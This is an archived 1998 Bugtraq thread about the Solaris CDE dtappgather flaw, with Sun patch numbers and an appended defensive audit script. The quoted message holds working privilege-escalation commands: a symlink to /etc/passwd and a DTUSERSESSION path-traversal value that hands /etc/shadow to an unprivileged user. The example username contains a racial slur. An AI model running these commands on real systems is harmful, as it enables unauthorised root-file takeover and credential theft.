Bugtraq mailing list archives

Re: /usr/dt/bin/dtappgather exploit


From: steven.goldberg () West Sun COM (Steven Goldberg - SE - Seattle WA)
Date: Wed, 25 Feb 1998 10:59:38 -0800


Hi,

Sun has published the following patches to address this
vulnerability:

patches  104497    CDE 1.0.1: dtappgather patch
patches  104498    CDE 1.0.2: dtappgather patch
patches  104499    CDE 1.0.1_x86: dtappgather patch
patches  104500    CDE 1.0.2_x86: dtappgather patch
patches  105837    CDE 1.2: dtappgather Patch
patches  105838    CDE 1.2_x86: dtappgather Patch


thanks,

Steve

--------------


Date: Tue, 24 Feb 1998 20:30:20 +0100
From: "J.A. Gutierrez" <spd () GTC1 CPS UNIZAR ES>
Subject: Re: /usr/dt/bin/dtappgather exploit
MIME-Version: 1.0
Content-Transfer-Encoding: 7BIT


        I suppose you have learnt about CERT's advisory on dtappgather
program. Well, here's the exploit:

nigg0r@host% ls -l /etc/passwd
-r--r--r--   1 root     other        1585 Dec 17 22:26 /etc/passwd
nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
nigg0r@host% dtappgather

    the exploit is much simpler than that.
        hey, it's even documented on the man page :-)

    Simply

    $ id
    uid=6969(foo) gid=666(bar)
    $ ls -l /etc/shadow
    -r--------   1 root     sys          234 Nov  7  1999 /etc/shadow
    $ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather
    $ ls -l /etc/shadow
    -r-xr-xr-x   1 foo      bar          234 Nov  7  1999 /etc/shadow


    Anyway, your exploit has an advantage: it works (at least,
    in Solaris 2.5), even after patching CDE according to CERT
    advisory.
    Solaris 2.6 seems to have the right permissions:

            /var/dt -> rwxr-xr-x
            /var/dt/appconfig -> rwxr-xr-x
            /var/dt/tmp -> rwxrwxrwt

--
    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)
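
The following is an added audit script, not code from either poster: it checks a CDE /var/dt tree against the Solaris 2.6 modes listed above and reports any symlink planted under appconfig/appmanager, which is what the ln -s trick depends on. It assumes find(1) with exact-octal -perm matching and readlink(1); the base directory is a parameter so it can be run against a copy as well as the live tree.

```shell
#!/bin/sh
# Added example: audit a CDE /var/dt tree for the two conditions this thread
# describes. Expected modes are the Solaris 2.6 ones quoted above; the
# symlink check covers the appmanager directory used by the ln -s trick.
# Assumes find(1) with exact-octal -perm matching and readlink(1).

# Expected octal mode per directory (relative to the tree's base).
expected_mode() {
    case "$1" in
        .)         echo 755  ;;   # /var/dt           -> rwxr-xr-x
        appconfig) echo 755  ;;   # /var/dt/appconfig -> rwxr-xr-x
        tmp)       echo 1777 ;;   # /var/dt/tmp       -> rwxrwxrwt
    esac
}

# True when the path's mode bits are exactly the given octal value
# (sticky/setuid bits included), without depending on stat(1) flavours.
is_mode() {
    [ -n "$(find "$1" -prune -perm "$2" -print 2>/dev/null)" ]
}

# audit_dt_tree BASE: print one line per finding, return the finding count
# (0 means the tree matches the Solaris 2.6 layout and holds no symlinks).
audit_dt_tree() {
    base=$1
    findings=0
    for entry in . appconfig tmp; do
        dir="$base/$entry"
        want=$(expected_mode "$entry")
        if [ ! -d "$dir" ]; then
            echo "MISSING  $dir"
            findings=$((findings + 1))
        elif ! is_mode "$dir" "$want"; then
            echo "MODE     $dir (expected $want)"
            findings=$((findings + 1))
        fi
    done
    # A clean appmanager directory holds no symlinks at all; any present
    # is exactly the planted link the exploit above relies on.
    for link in $(find "$base/appconfig/appmanager" -type l 2>/dev/null); do
        echo "SYMLINK  $link -> $(readlink "$link")"
        findings=$((findings + 1))
    done
    return "$findings"
}

# Stand-alone use: audit the live tree; exit status is the finding count.
if [ "${1:-}" = "--run" ]; then
    audit_dt_tree /var/dt
fi
```

Run as `sh audit_dt.sh --run` on the host, or source the file and call `audit_dt_tree` on a copied tree.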


